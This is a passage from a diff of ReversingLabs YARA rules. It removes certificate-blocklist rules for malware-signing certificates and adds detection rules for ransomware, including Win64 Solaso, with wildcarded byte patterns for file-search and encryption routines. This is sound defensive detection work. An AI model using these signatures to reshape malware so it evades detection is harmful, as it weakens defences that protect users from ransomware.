pe.signatures[i].serial=="c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d") and 1588679105<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_D591Da22F33C800A7024Aecff2Cd6C6D : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "294cbf90-cd1f-5743-a51a-46e1d04ef34e" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5540-L5558" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "30e421d5ea3c5693c5c9bd0e3dd997ceda9755d17e3fb16d2a8e6c4a327ae32f" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $search_files = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F9 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? + 57 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90 + 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? + 8B B5 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B + 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 + 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? + 66 8B 11 66 3B 10 75 ?? 66 85 D2 74 ?? 66 8B 51 ?? 66 3B 50 ?? 75 ?? 83 C1 ?? 83 C0 + ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 8D + 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 83 FE ?? 74 ?? + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? + 50 57 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 + FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 57 6A ?? 68 + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F9 68 ?? ?? ?? ?? 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 56 6A ?? 53 FF 15 ?? ?? ?? + ?? 8B F0 68 ?? ?? ?? ?? 57 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? + ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? + ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? + 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 + C0 75 ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 8E ?? ?? ?? ?? 33 + } + $encrypt_files_p2 = { + FF 8D 49 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? 33 F6 8D 51 ?? EB ?? 8D 49 ?? 8A 01 41 84 C0 75 ?? 2B CA 74 ?? BB ?? ?? ?? ?? + 8A 84 35 ?? ?? ?? ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? EB + ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? 88 94 35 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ?? 8B 9D ?? ?? ?? + ?? 6A ?? 6A ?? 57 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8D 9B ?? ?? ?? ?? + 8A 01 41 84 C0 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 8D 85 ?? ?? ?? ?? 50 53 FF + 15 ?? ?? ?? ?? 03 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 3B BD ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 53 FF 15 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? + 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO T2 Soft" and (pe.signatures[i].serial=="00:d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" or pe.signatures[i].serial=="d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d") and 1588679107<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($search_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B36E0F2053Caee9C3B966F7Be0B40Fc3 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Solaso : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Solaso ransomware." author = "ReversingLabs" - id = "8ed732ae-1c25-59fc-8ebe-50a1eb81e4a9" - date = "2023-11-08" - modified = "2023-11-08" + id = "53f56ad8-ccdf-58f0-a5d9-e58f2c18ac76" + date = "2021-11-02" + modified = "2021-11-02" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5560-L5578" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2444c78aefdb9e8c8004598a318db016d7e781ede6da2ba3ee85316456c3e77b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Solaso.yara#L1-L171" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "368a80a9f2e264d17c61d6ed4c22baec838ba0b0bc2e5c79344830bf861aa5a2" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Solaso" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PARTS-JEST d.o.o." and (pe.signatures[i].serial=="00:b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" or pe.signatures[i].serial=="b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3") and 1600172855<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_5B320A2F46C99C1Ba1357Bee : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "3912fdfc-7a84-51ce-abd2-977ad183af26" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5580-L5596" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "12797f80bce9d64c6c07e185aa309a0c4f910835745a7f2cc1874fb1211624d8" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + C6 85 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 4C 89 AD ?? ?? ?? ?? 48 8D 85 + ?? ?? ?? ?? 48 89 45 ?? B1 ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D + 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B BD + ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? 49 3B FF 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8D + 95 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? + ?? 48 0F 43 95 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 8B C8 E8 ?? ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 + ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ?? + 4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CF 48 83 7F ?? ?? 72 + ?? 48 8B 0F BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? + 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 89 AD ?? + ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 8B B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ?? + ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ?? 48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 85 ?? ?? ?? + ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 + } + $find_files_p2 = { + 8B DE 48 83 CB ?? 48 3B D8 48 0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D + 41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 + 0F 84 ?? ?? ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8 + E8 ?? ?? ?? ?? EB ?? 49 8B C5 48 89 85 ?? ?? ?? ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8 + ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 4C 89 6D ?? 4C 89 6D ?? 48 8B + B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ?? + 48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 45 ?? 48 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 + B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 8B DE 48 83 CB ?? 48 89 5D ?? 48 3B D8 48 + 0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ?? + ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ?? ?? ?? 48 83 C0 ?? + 48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8 E8 ?? ?? ?? ?? EB ?? 49 8B C5 + 48 89 45 ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 48 89 5D ?? 48 89 75 ?? 4C + 8D 85 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8D + } + $encrypt_files_p1 = { + 48 63 53 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 45 33 + C0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? + 4C 63 43 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 4B ?? 48 85 C9 0F 84 + ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 3B CA 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48 + 83 BD ?? ?? ?? ?? ?? 48 0F 43 45 ?? C6 04 01 ?? EB ?? 48 8B F1 48 2B F2 4C 8B 85 ?? + ?? ?? ?? 49 8B C0 48 2B C2 48 3B F0 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 7D ?? 49 83 F8 + ?? 48 0F 43 7D ?? 48 03 FA 4C 8B C6 33 D2 48 8B CF E8 ?? ?? ?? ?? C6 04 37 ?? EB ?? + 0F AE E8 C6 44 24 ?? ?? 4C 8B CE 48 8B D6 48 8D 4D ?? E8 ?? ?? ?? ?? 33 F6 8B 43 ?? + 99 41 F7 FD B9 ?? ?? ?? ?? 85 C0 0F 45 C8 89 4B ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 4C 63 + C9 4C 8D 45 ?? 48 8D 54 24 ?? E8 ?? ?? ?? ?? 48 8B F8 48 3B D8 74 ?? 48 8B 0B 48 85 + } + $encrypt_files_p2 = { + C9 74 ?? 48 8B 53 ?? E8 ?? ?? ?? ?? 48 8B 0B 48 8B 53 ?? 48 2B D1 48 83 E2 ?? 48 81 + FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87 + ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 48 89 33 48 89 73 ?? 48 89 73 ?? 48 8B 07 48 89 + 03 48 8B 47 ?? 48 89 43 ?? 48 8B 47 ?? 48 89 43 ?? 48 89 37 48 89 77 ?? 48 89 77 ?? + 48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C + 24 ?? 48 2B D1 48 83 E2 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 + ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 74 24 ?? + 0F 57 C0 F3 0F 7F 44 24 ?? EB ?? 48 8B 0B 48 8D 45 ?? 48 3B C8 74 ?? 48 8D 55 ?? 48 + 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB E8 + ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 74 + ?? 33 FF 0F 1F 40 ?? 66 0F 1F 84 00 ?? ?? 00 00 4C 8B 03 4C 03 C7 49 8B D0 49 83 78 + ?? ?? 72 ?? 49 8B 10 4D 8B 40 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 63 CE 48 C1 E1 ?? 48 + } + $encrypt_files_p3 = { + 03 0B 45 33 C0 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0B 48 03 CF 48 C7 41 ?? ?? + ?? ?? ?? 48 83 79 ?? ?? 72 ?? 48 8B 09 C6 01 ?? FF C6 48 83 C7 ?? 3B 73 ?? 75 ?? 48 + 8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ?? + 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 + 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 33 F6 F6 44 0C + ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D + ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? + 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 48 8D 4C 24 ?? E8 + ?? ?? ?? ?? BB ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 44 24 ?? + 48 03 C8 41 8B D4 48 83 79 ?? ?? 0F 45 D3 0B 51 ?? 45 33 C0 E8 ?? ?? ?? ?? 48 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 85 + ?? ?? ?? ?? 48 03 C8 48 83 79 ?? ?? 44 0F 45 E3 44 0B 61 ?? 45 33 C0 41 8B D4 E8 ?? + ?? ?? ?? 90 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 89 BC 0D ?? ?? ?? ?? 48 8B 85 ?? ?? + ?? ?? 48 63 48 ?? 8D 91 ?? ?? ?? ?? 89 94 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 84 0D ?? ?? ?? + ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 8D 51 ?? 89 94 0D ?? ?? ?? ?? 48 8D 1D ?? ?? ?? + ?? 48 89 9D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44 24 ?? 48 63 + } + $encrypt_files_p4 = { + 48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 91 ?? ?? ?? + ?? 89 54 0C ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 05 ?? + ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 51 ?? 89 54 0C ?? 48 89 5D ?? + 48 8D 4D ?? E8 ?? ?? ?? ?? 90 49 8B 57 ?? 48 83 FA ?? 72 ?? 49 8B 0F 48 FF C2 48 81 + FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87 + ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89 77 ?? 49 C7 47 ?? ?? ?? ?? ?? 41 C6 07 ?? + 49 8B 56 ?? 48 83 FA ?? 72 ?? 48 FF C2 49 8B 0E 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 + ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89 + 76 ?? 49 C7 46 ?? ?? ?? ?? ?? 41 C6 06 ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? + ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3 + E8 + } + $encrypt_files_p5 = { + 48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 4C 89 40 ?? 55 41 54 41 55 41 56 41 57 + 48 8D 68 ?? 48 81 EC ?? ?? ?? ?? 45 8B E1 49 8B D8 44 8B 4D ?? 48 8B FA 44 8B 45 ?? + 48 8B F1 41 8B D4 48 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 00 F2 0F 10 48 ?? 0F 11 45 ?? 66 + 0F 73 D8 ?? 66 49 0F 7E C7 F2 0F 11 4D ?? 49 C1 EF ?? F2 0F 11 4D ?? 4C 89 7D ?? 41 + 83 FF ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 89 07 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ?? + ?? ?? C7 00 ?? ?? ?? ?? EB ?? 8B 4D ?? 4C 8D 4D ?? 4C 8B 75 ?? 41 8B C4 48 8B 55 ?? + 45 8B C7 C1 E8 ?? 49 C1 EE ?? F7 D0 44 0B 75 ?? 83 E0 ?? C7 06 ?? ?? ?? ?? 33 F6 48 + 89 74 24 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B CB 48 C1 EA ?? C7 45 ?? ?? ?? ?? ?? 48 + 89 75 ?? 89 45 ?? 4C 89 75 ?? FF 15 ?? ?? ?? ?? 8B 5D ?? B9 ?? ?? ?? ?? 4C 8B E8 48 + 83 F8 ?? 75 ?? 8B C3 23 C1 3B C1 75 ?? 41 F6 C4 ?? 74 ?? 8B 4D ?? 4C 8D 4D ?? 48 89 + 74 24 ?? 0F BA F3 ?? 89 5D ?? 45 8B C7 48 8B 55 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B + } + $encrypt_files_p6 = { + 4D ?? 48 C1 EA ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 83 F8 ?? 75 ?? 48 63 0F 4C 8D 3D ?? + ?? ?? ?? 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8 ?? ?? FF 15 + ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 85 C0 75 + ?? FF 15 ?? ?? ?? ?? 8B C8 8B D8 E8 ?? ?? ?? ?? 48 63 17 4C 8D 3D ?? ?? ?? ?? 48 8B + CA 83 E2 ?? 48 C1 F9 ?? 48 8D 14 D2 49 8B 0C CF 80 64 D1 ?? ?? 49 8B CD FF 15 ?? ?? + ?? ?? 85 DB 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44 8A + 75 ?? 83 F8 ?? 75 ?? 41 80 CE ?? EB ?? 83 F8 ?? 75 ?? 41 80 CE ?? 8B 0F 49 8B D5 E8 + ?? ?? ?? ?? 48 63 0F 4C 8D 3D ?? ?? ?? ?? 48 8B C1 41 80 CE ?? 48 C1 F8 ?? 83 E1 ?? + 44 88 75 ?? 49 8B 04 C7 48 8D 0C C9 44 88 74 C8 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 + F8 ?? 48 8D 0C C9 49 8B 04 C7 40 88 74 C8 ?? 41 F6 C4 ?? 74 ?? 8B 0F E8 ?? ?? ?? ?? + 89 45 ?? 85 C0 74 ?? 8B 0F E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 0F 10 45 ?? 4C 8D + 4D ?? 8B 0F F2 0F 10 4D ?? 48 8D 55 ?? 45 8B C4 0F 29 45 ?? 40 88 75 ?? F2 0F 11 4D + ?? E8 ?? ?? ?? ?? 48 63 0F 89 45 ?? 85 C0 75 ?? 48 8B C1 48 C1 F9 ?? 83 E0 ?? 49 8B + } + $encrypt_files_p7 = { + 0C CF 48 8D 14 C0 8A 45 ?? 88 44 D1 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D + 14 C9 49 8B 0C C7 41 8B C4 C1 E8 ?? 24 ?? 80 64 D1 ?? ?? 08 44 D1 ?? 41 F6 C6 ?? 75 + ?? 41 F6 C4 ?? 74 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 + 80 4C C8 ?? ?? B9 ?? ?? ?? ?? 8B C3 23 C1 3B C1 0F 85 ?? ?? ?? ?? 41 F6 C4 ?? 0F 84 + ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8B 4D ?? 4C 8D 4D ?? 44 8B 45 ?? 0F BA F3 + ?? 48 89 74 24 ?? 89 4C 24 ?? 8B 4D ?? 89 4C 24 ?? 48 8B 4D ?? 89 5D ?? 48 8B 55 ?? + 48 C1 EA ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B C8 E8 + ?? ?? ?? ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8 + ?? ?? 8B 0F E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 0F 48 8B C1 48 C1 F8 ?? 83 E1 ?? 49 + 8B 04 C7 48 8D 0C C9 48 89 54 C8 ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B + 73 ?? 49 8B 7B ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REGION TOURISM LLC" and pe.signatures[i].serial=="5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" and 1602513116<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of 